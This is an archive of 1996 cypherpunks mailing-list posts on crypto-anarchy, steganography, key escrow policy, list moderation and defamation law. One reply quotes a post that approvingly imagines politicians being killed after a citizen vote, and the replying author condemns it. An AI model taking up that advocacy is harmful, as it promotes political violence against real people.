in a particular way the low-order bits form a stego filesystem but no one
will be able to prove it in court.

>> The funny thing about noise in the information theory sense is that it can
>> actually be _anything_ depending on context, and this sort of uncertainty
>> is the bane of a legal system which is solidly grounded upon technicalities
>> (such as the US legal system.)
>
>Which technicalities protected the Japanese-Americans during World War II?

Few.  OTOH the interment of Japanese-Americans occurred during a period of
war, at a time when civil liberties were much more limited, and when
Asian-Americans were second-class citizens with very little political power
(that and the Korematsu decision was a complete piece of crap...)  Today
most US citizens distrust the US governement, civil liberties and protections
are fairly well established in law and legal precedence, and we techno-nerds
are actually the ones running the country :)  [Actually the internment of
Japanese-Americans was really a big land grab masquerading as a wartime
necessity, but that does not change the fact that it happened...]

>The legal system would have to be stretched considerably less to outlaw
>strong crypto and make it stick.

It would have to be shattered to make such a ban stick.  Times have changed
quite significantly since the 40s, and free speech rights and the first
amendment have become rather important to our information society.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 17:55:35 -0800 (PST)
To: Jim McCoy <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b04aea83f2ff40e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:13 PM 11/7/1996, Jim McCoy wrote:
> Getting a program to recognize a subliminal message channel is even
> harder than teaching a human to do so, check out the book Disappearing
> Cryptography or do a web search for "mimic functions" to see how easy it
> is to hide messages in text which a program parses as regular English.
> The other problem is that more and more of the data being tossed around
> the net are images and sound files in which it is incredibly easy to
> hide encrypted messages.

I doubt it is as easy as you say.  Truly noisy sources are unusual.
You don't have to be 100% sure you have a crypto-terrorist on your hands
to search their house, interrogate them, and talk for awhile to
everyone they know and then watch them carefully from then on.

You don't have to have very many convictions with life sentences
to discourage most experimenters which means that you can afford
to spend a lot of time and effort on those that you can find.

The perpetrator need only mess up once to be put in jail where he belongs.

Assuming that it is possible to identify most crypto-anarchist-terrorists
as suspects (possibly through informants or surveillance or tax audits)
it should be fairly simple to find their contraband disks and data when
you search their house.  The problem with executables is that they have
to execute so you can tell if they are encryption software.  How will
you handle this problem?

>> In the absence of strong cryptography, remailers do not offer much
>> anonymity.

> Except for the fact that US law stops at the US border (modulo kidnapping
> Mexican doctors or strongarming the rest of the world to obey US
> dictates...)  Information, on the other hand, is very easy to transport
> across national boundaries and such transmission is impossible to stop.
> With remailers outside the US I can send a message to a free nation and
> have it delivered to whomever I want.

Cross border transmissions of illegally encrypted information is as hard
to stop as the use of strong cryptography.  If you can stop, for the
most part, the use of strong cryptography, then you can stop the use
of foreign remailers, errrr, I mean espionage mailers.

Were there strong support for it, even cross border activity could be
significantly curtailed.  This would complicate the practice of carrying
stego'd materials across by hand.  That may seem improbable, but I know
that in the late 1960s the Johnson Administration seriously considered
limiting U.S. tourism because of the negative impact it had on the dollar.

In the model I am positing, there would be broad popular support for
such policies.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 7 Nov 1996 18:15:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: [off subject]Re: Parents effectively lose their right
Message-ID: <199611080215.SAA23645@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 AM 11/6/96 -0800, Michael Craft wrote:
>> Family Research Council Washington Watch News - October 25, 1996 - Vol.
>> 8:1
>> 
>> "Parents effectively lose their right to direct the upbringing of their
>> children ..., ruled that Katy Independent School District in TX did
>> not violate parents' rights by allowing Child Protective Services to 
>> interrogate a student without notifying his parents, nor by instructing 
>> him to lie to his parents about the incident."
>
>Spanking and ecumenical prayer may be illegal in the schools, but 
>methinks the above is actually more harmful to society than mindless
>prayer or a little paddling.
>
>
Actually, at least in Oklahoma, corporal punishment is still quite legal,
it's just considered risky.  Many parents actually believe that "thier
little angel can do no wrong", incapable of believing that the actions that
thier little hooligans propagated.  It is these parents who might sue, but
that doesn't change the fact that at least in Oklahoma, corporal punishment
can still be used in the schools.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 7 Nov 1996 18:17:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: [rant]Re: black high heal shoes?
Message-ID: <199611080215.SAA23650@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Clinton wearing black and white shiny vinyl high
>heel shoes, and nothing else but a transparent
>plastic raincoat. 
>
>Embroided on the back of the clear plastic raincoat
>is the bar code for the RSA algorithm. 
>
>He is walking around the RSA Data Security Conference
>with the outfit on, trying to hug and kiss the attendees,
>but they all ignore and make fun of him!


When I think about Clipper.
In my personal opinion, Clinton is afraid of unrestricted crypto because
when he thinks about all the things he would have done with it when he was
(is?) a hippie radical, he shuders, then, he makes the error of assuming
that everyone in the U.S. of A. has the same low morals that he has shown.
He feels that he must protect us from the monsters, yet, he feels that we
are all potential monsters.
And when I think about the assualt rifle ban, I think the same thing.
In my personal opinion.  None of this should be taken for anything but my
opinion.
Oh the nightmares you must have Mr. President.  I am grateful that I don't
see the world through your eyes.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Thu, 7 Nov 1996 18:19:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: [rant] Race
Message-ID: <199611080215.SAA23654@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
...
>What you mean WE, white man?  ...
At first I was afraid to comment, as I have been more than vocal in the last
24 hours, but then I decided that I thought this important enough to bring up.
This was the first time on this list that I noticed such an obvious
reference to race, granted I'm fairly new to the list,(quite new in fact),
and when I think about it, there were several references to Russians and
Jews in some of the other posts about Dr. Vulis and his practices.  In my
rose colored view, I had not taken notice, possibly because they were
comments about the statements made by an individual, more likely because I'm
gratefully ignorant to most of the filth of this imperfect world.  I was
unaware of some of the hardships some of my friends and their friends still
go through just because of their skin color.  Not Just with recognized,
individual bigots, but also with the police, and I live in a sparsely
populated area.
The point I was going to make was that this comment caught my eye, because
it bridged my real, though I should say corporal as this is quite real,
world with my online world.  For a week there, I was a individual in a
society of minds, our "race" depended on our individual views.  I like being
online, I am judged by what I think matters.  When something threatens my
ability to be free of the definitions put on my physical shell, I react.
Does this have any relation to crypto?  No  But it does have relevance to
anonymity.  Online I can be who I feel like, not what I look like.
For those wondering who I am, I may be an AI painted purple with a big intel
sticker on my side, it doesn't matter, what do you think about my ideas.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 18:26:05 -0800 (PST)
To: jim bell <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b05aea845867165@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM 11/7/1996, jim bell wrote:
>At 12:22 PM 11/7/96 -0800, Peter Hendrickson wrote:
>>It appears to be widely believed that cryptoanarchy is irreversible.
>>Everybody believes that the race to deploy or forbid strong cryptography
>>will define the outcome for a long time.

>> I can't think of a reason why this should be so.

>> If the wide use of strong cryptography results in widely unpopular
>> activities such as sarin attacks and political assassinations, it
>> would not be all that hard to forbid it, even after deployment.

> Simple analogy:  Suppose you put two people into a room with a deck of
> playing cards and a table, instructing "Person A" to build a house-of-cards,
> and telling "Person B" to stop him from achieving his goal.  Who do you
> think will win?  Obviously, the latter will win:  It's vastly easier to
> knock such a structure down than to build it in the first place,  and all
> "Person B" has to do is occasionally take a whack at the structure.

> BTW, some of your confusion is probably based is the false assumptions in
> your last sentence above.  "..wide use of strong cryptography results in
> widely unpopular activities such as sarin attacks and political
> assassinations."

No, you're confused, but it's probably my fault.  We don't really know
what cryptoanarchy will be like.  We all have ideas about it.  Some
we share and some we don't.  But we won't really know until we see it
happen.

My whole point is based on the proposition that the doomsayers are right.
I believe D. Denning has suggested that cryptoanarchy will result in
the breakdown of our society.  The implication is that we must stop
this from happening.  What I am saying is that we can wait and see
before going into a panic.  If it turns out to be bad - and I mean
Assassination Politics, by the way - it is reasonable to assume that
broad popular support for the suppression of strong cryptography will
result.  Even most cypherpunks would support and participate in such
policies if it appeared to be necessary.  Broad popular support means
that it will be possible to roll back cryptoanarchy.  That means
we don't need to do anything hasty now.  The people who want to do
some hasty should be called upon to justify their beliefs.  To date
I don't believe they have done so.

It might be a good idea to reread the first sentence of the last
paragraph.  I am not repeat not endorsing the Four Horsemen scenario.

> First, I contend that the unpopularity of political assassinations is based
> far less on their presumed undesirability, and much more so on the fact that
> the average citizen (currently) has no input on who is being killed.  He
> might well suppose that the killings are trying to deny him the little power
> and influence he has in the political system. ("They shot [fill in the
> blank}!  I voted for him!")  But what if assassination was made far more
> accessible to the common man?  Suppose, say, the approval of one million
> citizens was the only thing necessary to have an assassination legally
> accomplished?   Or, more likely in practice, the vote of a million citizens
> was interpreted as a kind of terminal veto over that particular politician
> or government employee, who would have to resign or face the (lethal)
> consquences!  In that case, assassinations wouldn't be seen as bad, they'd
> be the natural consequence of a politician who overstays his welcome and
> ignores numerous warnings.

It is my opinion that your bloodthirsty dreams have done a great deal to
discredit cryptoanarchy.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 7 Nov 1996 16:56:51 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v03007801aea81885c729@[207.167.93.63]>
Message-ID: <9611080056.AA00887@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


TCM writes:
> Wide distribution of tools and channels.

A very important point that I haven't seen raised in this thread is _why_  
strong crypto is going to be widespread and thus impossible to control.   
Strong crypto is going to be the foundation of the information age.  Sorry for  
the buzzwords, but it is very obvious to almost everyone that there is  
potentially a lot of money to be made with the 'Net and strong crypto is  
required to guarantee that people get what is coming to them and not get  
ripped off.  Strong crypto maximizes returns by outright preventing fraud  
(which is far better than after-the-fact legal remedies!) and allowing more  
efficient collection of money (with self-enforcing protocols and eliminating  
middle men).  Weak Crypto (i.e. GAK) does not offer these features because the  
weak point in the chain becomes a mostly disinterested low-wage employee at  
the KRC, which is likely to be operated by a foreign government!  Any  
businessman can immediately understand why this is unacceptable, especially  
with all of the economic espionage stories going around corporate america.

People will outright demand strong crypto.

This is already happening.  Despite intense pressure from TLA's for GAK,  
savvy businesses are demanding strong crypto (the idea that no crypto at all  
will be used is utterly ridiculous, it will either be strong or GAKed but  
there will be crypto).  Hardly anyone is bowing to the pressure.  It will take  
a mandate from congress to get people to actually use GAK, and the more  
businesses and congresscritters begin understand the benefits of strong crypto  
to the bottom line, the less likely such a mandate would happen.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 19:00:31 -0800 (PST)
To: Jim McCoy <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b07aea84b33c6fd@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:48 PM 11/7/1996, Jim McCoy wrote:
> Peter Hendrickson writes:
>> If mandatory GAK were imposed, reviewing messages is easy, even with
>> inter-agency fighting.  Or, encryption in general could just be
>> forbidden if GAK created too much hassle.

> Encryption itself will never be forbidden because there is far too much
> money riding on electronic commerce.

I think this is true.  Good computer security, including encryption,
is clearly important to the financial well being of the country.
If we consider that to be a national security issue, then we have
to ask why the national security apparatus is attempting to undermine
our security.

> An administration which tried to outlaw all encryption would soon find
> itself on the next train out of D.C. after the next election cycle.

But if the doomsayers are right, this would not be the case.  Most
people will be willing to give up some Internet commerce if they believe
it is necessary to protect their children and maybe their society.
That is not even an unreasonable point of view.

>> In practice I suspect that good stego is hard.

> You are mistaken.  Read Disappearing Cryptography to see just how easy
> it is, then check out Romana Machado's EzStego program (done in Java so
> it can be added to any web download with a bit of tweaking.)   If the
> penalty for using bad stego is high enough you can be certain that natural
> selection will make certain that eventually the programs being used are
> top notch code :)

I may be mistaken.  I have added "Disappearing Cryptography" to my list.
Still, my intuition says that it is quite hard to do stegonography for
many years and never tip your hand even once.

>> You don't have to be right every time when you look for it, just some
>> of the time....

> The problem is that you need to be able to prove that stego is in use, and
> this is a much more difficult task than you suggest.

But you really don't need to prove it.  You just have to convince a judge
to issue a warrant for you to get the real evidence.  If you have to,
you'll train a dog to sniff stego.  (That was a joke by the way. ;-)

>> You might also identify suspects in other ways.  Maybe that Jim McCoy
>> is looking a little too successful or perhaps he made an unwise comment
>> to a "friend" who reported him.  That could easily be grounds for a
>> warrant and subsequent change of quarters.

> Get a warrant, search my system, find nothing but a bunch of applications
> and a collection of risque (but definitely legal) pictures which I exchange
> with a few friends.  You may suspect that when the images are concatenated
> in a particular way the low-order bits form a stego filesystem but no one
> will be able to prove it in court.

Are you concatenating these images by hand?  If so, the level of entropy
is probably low enough to recover the information through brute force
methods or you are hiding a very small amount of information.

If you are not doing it by hand, you own terrorist software and will pay
the price.

And, by the way, who are these friends?  Can any of them finger you in
exchange for a reduced sentence?

Incidentally, I hope nobody on this list believes they will be able
to practice cryptoanarchy in my scenario.  You are already suspects.

>> Which technicalities protected the Japanese-Americans during World War II?

> Few.  OTOH the interment of Japanese-Americans occurred during a period of
> war, at a time when civil liberties were much more limited, and when
> Asian-Americans were second-class citizens with very little political power
> (that and the Korematsu decision was a complete piece of crap...)

In the Four Horsemen scenario, where people are being murdered all the
time and the society is in a turmoil, popular support for the suppression
of strong cryptography would be easy to arrange.

> Today most US citizens distrust the US governement, civil liberties and
> protections are fairly well established in law and legal precedence, and
> we techno-nerds are actually the ones running the country :)

In the Four Horsemen scenario, it is likely that most engineers would
be delighted to help put things to rights.

>> The legal system would have to be stretched considerably less to outlaw
>> strong crypto and make it stick.

> It would have to be shattered to make such a ban stick.  Times have changed
> quite significantly since the 40s, and free speech rights and the first
> amendment have become rather important to our information society.

This is correct.  But these views would be change if we were facing
a terrible situation.  It isn't even clear that you would have to
tamper with free speech rights all that much to suppress strong
cryptography.  There would be a dramatic political risk that all rights
would disappear later, but after somebody you know gets killed
anonymously, you might be willing to chance it.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 19:20:18 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b0aaea854a8000a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:24 PM 11/7/1996, Timothy C. May wrote:
> At 6:56 PM -0600 11/7/96, Andrew Loewenstern wrote:
>> middle men).  Weak Crypto (i.e. GAK) does not offer these features because
>> the
>> weak point in the chain becomes a mostly disinterested low-wage employee at
>> the KRC, which is likely to be operated by a foreign government!  Any
>> businessman can immediately understand why this is unacceptable, especially
>> with all of the economic espionage stories going around corporate america.

> And the GAK advocates have never clarified how an international system will
> work. Even if one accepts the dubious hypothesis that the U.S. has a
> noncorrupt, benign government, what of other countries? Is Ghaddaffi the
> keeper of keys in Libya? How about the military government of Burma?

> I can imagine no scheme which could possibly solve this problem. None. The
> problem of "rogue governments" (and maybe all governments are rogue to at
> least some other governments) means no simple solution. And the
> Administration has done nothing to clarify how this will all work.

I cannot speak for the GAK advocates.  However, you could establish a
system where messages between two countries are encoded with keys
which are made available to only the two countries in question.

A really simple scheme to do this would be for each country to publish
a public key.  You would be required to encrypt the key to the message
with the national public key.  That scheme would be fast to deploy.

In a more complicated and secure scheme, you would be given a public key
from each country that was unique for your communications at the same
time you were granted your international communications license.  The
unique public key would be managed by a small group of people.  This
means that if it was ever compromised, most message traffic would be
secure and those who were responsible would be easy to find.

The only way you are at the mercy of the Libyans is if you do business
in Libya.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 7 Nov 1996 20:21:22 -0800 (PST)
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: exclusion/censorship and the law
Message-ID: <3.0b28.32.19961107195807.0073290c@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:27 PM 11/6/96 -0600, Jim Choate wrote:

>There is one important legal aspect which the operator of the Cypherpunks
>mailing list has opened themselves up for with this action. In short they
>have now opened themselves up for defamation and liable suites by imposing
>an editorial policy on the contents of this list (1).
>
>This opens up the potential, for example, for Tim May to sue the operator of
>the Cypherpunks mailing list now for posts from users (even anonymous ones)
>which defame or otherwise liable his character, reputation, or ability to
>pursue income in his chosen field. In short the operators of the list
>becomes publishers and distributors of the material. It is the legal
>difference between a bookstore and a book publisher. 

I don't pretend to have spent much attention on defamation, but the cases
I've seen don't go nearly this far. The two that come to mind are _Cubby v.
Compuserve_ 776 F. Supp. 135 (1991), and _Stratton Oakmont v. Prodigy_
(sorry, no cite at hand). _Cubby_ said that service providers were liable
*only when they had knowledge of the defamation*. Since the list is set up
(as far as I know) to forward messages (regardless of source) to the
subscribers without further editorial review, _Cubby_ suggests no liability
here. _Stratton Oakmont_ went the other direction (finding potential
liability for defendant service provider, on a motion for preliminary
injunction? can't remember) but has been widely criticized; that ruling
never faced any extended scrutiny because the parties settled. Also,
Prodigy, the defendant in Stratton Oakmont, exercised much greater
editorial control over postings on that service, and had the ability to
remove postings, which is something John Gilmore can't do.

So my impression is that you've got the tail end of a useful concept
(ability to control is frequently a factor used to determine liability) but
are making far too much out of it. One really big difference I see here is
that editorial control of the Cpunks list has occurred once (in 4? 5? years
of the list's existence), is on a per-person not a per-message basis, and
*does not function to restrict who can send messages but only limits Vulis'
ability to _receive_ them on his usual system(s)*.

You might take a look at Mike Godwin's article on net defamation at
<http://www.eff.org/pub/Legal/net_libel_godwin.article>; by now it's a
little old, but I don't think anything's happened since which would change
its reasoning. 

>Censorship is censorship, irrespective of the source of the limitation.
>Free expression is impossible in an environment of censorship.

The problem with absolute statements like this is that they ignore
important distinctions about scale - e.g., I think that it's very important
that people, generally, be free to discuss whatever they want in private
homes. But I also think it's very important that I be able to tell other
people that they're not willing to discuss whatever they want in *my* home.
Not because I'm especially excited about censorship, but because I enjoy my
privacy and my peace & quiet. So on the level of national rights, yes,
unrestricted speech is an excellent thing. But on the level of my living
room, unrestricted speech is a very bad thing. 

I don't think anyone who is arguing that it's fine to throw Vulis off the
list would make the argument that it would be acceptable for the government
to throw Vulis off of the Internet. 

The closest thing I can see to a First Amendment argument against Gilmore
is the "company town" argument, that the list is so much like a city or
town that it ought to be subject to the restrictions that the First
Amendment puts on municipalities and traditional public forums - but even
this (rather far-out) argument got shot down a few days ago when our
beloved Wallace of CyberPromo tried it in _Cyber Promotions v. America
Online_. The judge said "no way", and I think that argument's a lot more
plausible against American Online than against John Gilmore. 

>I have argued in the past that this list is a defacto public list because of
>the way it is advertised and to the extent it is advertised. All the protests
>by the operator to the contrary will not convince a court.

I don't think this makes any sense. "Public list" has no special meaning.
My impression is that you're trying to make an analogy to public places
which are privately owned like motels and lunch counters and amusement
parks, where the owners (despite being private actors) cannot discriminate
on the basis of race, gender, national origin, etc. (See, e.g., Civil
Rights Act of 1964, 42 USC 1981 et seq)

But I don't think there's any especially credible allegation that Vulis was
discriminated against on the basis of protected class membership; nor is it
clear that the Civil Rights Act can be extended to the operation of mailing
lists. (Can someone shed some light on this? I've spent some time reading
civil rights cases and can't remember one which gets even close. But I hate
to say "can't be done" on the basis of failing to remember a case where it
has been done.) My hunch is that (especially with this Supreme Court) the
First Amendment's right to speak and assemble freely would trump Congress'
attempt (pursuant to the Fourteenth Amendment, Section V) to regulate the
distribution of speech. 

If there's no prohibited discrimination (either because there's no
prohibition, or there was no "discrimination" within the terms of the
statute) then I don't see a cause of action. Wanting something you're not
getting isn't enough. Owners of "public places" like malls or stores or
restaurants are still free to exclude some people for non-prohibited
reasons (like not meeting the dress code, or having behaved poorly in the
past). And Vulis' behavior is certainly enough to suggest that his
exclusion from the list (which has not impaired his ability to speak to the
list) was neither arbitrary nor wrongly discriminatory. So I really don't
think that a civil rights-flavored argument even gets to first base here.

I am pretty disappointed to see that none of the people who profess to be
shocked and wounded at Vulis' exclusion have bothered to set up your own
lists. In my mind, whatever moral outrage you claim to have looks awfully
small compared to the relatively small burden of doing something about what
you say is bothering you. 

Someone said that saying "start your own list" is like saying "well, go
start your own country"; but the difference is that you can only live in
one place at a time, so starting your own country on some faraway island
means severing personal and professional ties in the place that you live
now, abandoning the countryside you've come to know and love, etc. But
there's no reason that you can't start your own mailing list and stay on
cypherpunks. As I pointed out a few days ago, you can even subscribe your
list to the cypherpunks list, so that your list is "cypherpunks++". I think
there are some copyright issues lurking here, but there are at least two
filtered cypherpunks lists running, as well as Bob Hettinga's e-$pam list,
which make use of cpunks traffic, and I'm not aware that any of those folks
have attracted suits for their reproduction of list traffic. So I don't see
any big obstacle to one or more people fixing what they say is a big
problem. So I'm left to wonder if this really isn't the big deal people
seem to enjoy making it into, or if it's a big deal, but free speech and
lack of censorship is worth less than some time and/or some money to these
folks. 

I think that "cypherpunks write code" can/should be understood as a
question, e.g., "what are you doing to change the things that bother you?" 
--
Greg Broiles                | "In this court, appellant and respondent are the
gbroiles@netbox.com         |  same person. Each party has filed a brief."
http://www.io.com/~gbroiles |  Lodi v. Lodi, 173 Cal.App.3d 628, 219 Cal.
                            |  Rptr. 116 (3rd Dist, 1985)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 7 Nov 1996 16:40:50 -0800 (PST)
To: dthorn@gte.net>
Subject: Re: [rant] Re: Censorship on cypherpunks
In-Reply-To: <32816F8E.6580@gte.net>
Message-ID: <Pine.LNX.3.95.961107203632.1129A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 6 Nov 1996, Dale Thorn wrote:

> What both of these arguments (moreso the first) fail to mention is an individual's
> investment in time and possibly a lot of money in various memberships, with expec-
> tations that they will have the opportunity to develop and express themselves to
> their utmost capability.  When I have a problem with some of the dirty things my
> representatives in Washington DC do on my behalf, people say "like the U.S. or
> leave it", etc., as though my father, his father, his father, etc. clear back to
> the 1600's in the colonies here, wasted their blood on the battlefields defending
> these assholes who like to say "you can just leave if you don't like it".

This is why contracts are important.  There is no contract, implied or
otherwise, to which John Gilmore is bound that forces him to protect everyone's
"right" to be subscribed to cpunks and post whatever they want to the list.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoKP0CzIPc7jvyFpAQGolwf/WKjsPl/SuGgzrNvxV6IsTeCPeS85FJXB
KAj7Yz5TnBxILNJD4Cc4iy3AeGwzGFiula+jqLhuzLlnVMmPdwu/fo/kvBQGSDd8
ciMH1RgybeHLP0zaQQXqD6ilRtRTaUl0e50kxpKrY1UXUELbm6zojNURLvCp8Ill
zmxQ94KKgV4tytqMSqTOaN5OnR9TlKdqD2QEAGJFVAjx8SOSDyYF02ad/Xmj6sCe
BOzRguWy7LshRX89mH3DRx8SIe7Wta5CZkT5zkernwAJa2fnP+CSu6Pre9pzlyO0
T8spMgnWKAKu4SxlY5qFrPjIhOuud+5zbuhyjQxkdKrpvQcfb+f+RQ==
=FWJN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 7 Nov 1996 21:04:46 -0800 (PST)
To: Paul Foley <mycroft@actrix.gen.nz>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <199611071509.EAA13032@mycroft.actrix.gen.nz>
Message-ID: <3282BAF1.9E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Paul Foley wrote:
> On Wed, 06 Nov 1996 21:43:51 -0800, Dale Thorn wrote:
>    Sandy Sandfort wrote:

[snippo]

> Try this at home: send email addressed to majordomo@toad.com with the
> body "who cypherpunks".  When you get a reply, save it in a file.  OK,
> you now have a list of who's subscribed to this list on your computer.
> Is it your contention that you should not be allowed to edit or delete
> this list?  If you reply in the negative, why do you think that John
> Gilmore shouldn't be allowed to edit his copy of this list?

[mucho snippo]

It amazes me how erstwhile "intelligent" folks will waste so much time stating the
obvious, i.e., "John owns the list, etc.".  I doubt whether they'd make very good
programmers, with so much time on their hands and so little imagination.

BTW, I did a "who cypherpunks" on Oct 12, and another on Nov 4.  There were 1361 on
the list on Oct 12, and 1353 on Oct 4 (net loss of 8).  There were 211 new nyms,
and 219 dropped off.  If enough of these people who come and go stay just long
enough to learn something, and possibly give up some of their own info at the same
time, that could translate to a lot of influence on the part of the list "owner".

Anytime *anyone* accumulates a disproportionate share of power, money, or influence
in a "free" society, they should be watched very closely.  In fact, you folks who have
so much time on your hands could help with that...

BTW #2:  I didn't do the stats manually, I used utilities made for the purpose.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 20:44:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b0aaea854a8000a@[192.0.2.1]>
Message-ID: <v03007801aea869b8d096@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:20 PM -0800 11/7/96, Peter Hendrickson wrote:
...
>I cannot speak for the GAK advocates.  However, you could establish a
>system where messages between two countries are encoded with keys
>which are made available to only the two countries in question.
>
>A really simple scheme to do this would be for each country to publish
>a public key.  You would be required to encrypt the key to the message
>with the national public key.  That scheme would be fast to deploy.

Well, this is not what the proposals for GAK involve. If it were _only_ a
matter of each country requiring GAK for communicatons entering its
country, then this would be as you describe (not that many of us would
approve of it).

What complicates matters is that the U.S. proposes that _it_ keep
records/escrows of communications with, say, recipients in Libya. Or
Russia, or Burma, or Tazbekinoya. This means automatically that simplistic
models ("encrypt to the public key of Tazbekinoya" will not be sufficient).

>In a more complicated and secure scheme, you would be given a public key
>from each country that was unique for your communications at the same
>time you were granted your international communications license.  The
>unique public key would be managed by a small group of people.  This
>means that if it was ever compromised, most message traffic would be
>secure and those who were responsible would be easy to find.
>
>The only way you are at the mercy of the Libyans is if you do business
>in Libya.

No, I think you are missing the point. The issue about Libya is that the
GAK system must make decisions about when and under what conditions it
accedes to government wishes--for governments we may be hostile toward.

Or governments may be hostile toward us.

As I said in another message, I don't think there can be a unified GAK
policy. I believe the U.S. Administration hopes to browbeat enough nations
into compliance such that it--the U.S. government--controls which keys are
released and which are not. My point about "rogue" governments is that the
problems of Burma, Libya, etc. will not vanish. Clearly the U.S. government
will not settle for waiting for Libya or Burma to co-release keys....

And nothing in GAK says one gets to communicate with Libyan parties by
encrypting with the public key of Libya, thus bypassing the U.S. decryption
capabilities!

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 7 Nov 1996 21:03:59 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Validating a program
In-Reply-To: <199611071941.OAA13267@homeport.org>
Message-ID: <3282BD90.43FA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> Dale Thorn wrote:
> | stewarts@ix.netcom.com wrote:
> | > >> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
> | > >> > Last,  I would like to know once and for all,  is PGP compromised,  is
> | > >> > there a back door, and have we been fooled by NSA to believe it's secure?

> | > You can read and compile the source code yourself.

> | Really?  All 60,000 or so lines, including all 'includes' or attachments?
> | I'll bet you can't find 10 out of 1,000 users who have read the total source,
> | let alone comprehended and validated it.

[snip]

> In short, if you're paranoid, feel free to look over the source.  But the fact that
> most people have never peeked under the hood is not a strike against pgp at all.

The quip about peeking under the hood may apply OK to an automobile, but to a program
which encrypts?  Granted that most messages (99+ % ??), if read by NSA et al, won't
put the sender in any great danger, but when the application is really serious, as it
always is sooner or later, you must realize that people could be taking great risks
with PGP encryption, and "pretty sure" isn't good enough when it's really, really
vital to have bulletproof security.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Thu, 7 Nov 1996 18:06:32 -0800 (PST)
To: roger.grewe@ncr.daytonoh.com
Subject: Fwd: God and None (fwd)
Message-ID: <961107210454_1148658863@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



---------------------
Forwarded message:
From:	scotta@astea.com (Scott Auge)
To:	scottauge@aol.com
Date: 96-11-07 10:18:29 EST



---------- Forwarded message ----------
Date: Tue, 5 Nov 1996 21:26:43 GMT
From: Donald Sellari <dsellari@btg.com>
To: scotta@hpg60.astea.com
Subject: None

                       History Of The Net
>                       ==================
>
> First there was God. He was quite lonely so he created Dennis.
>
> Dennis was unimpressed with God.
>
> So,... God created Brian.
>
> But, Brian got bored with God.
>
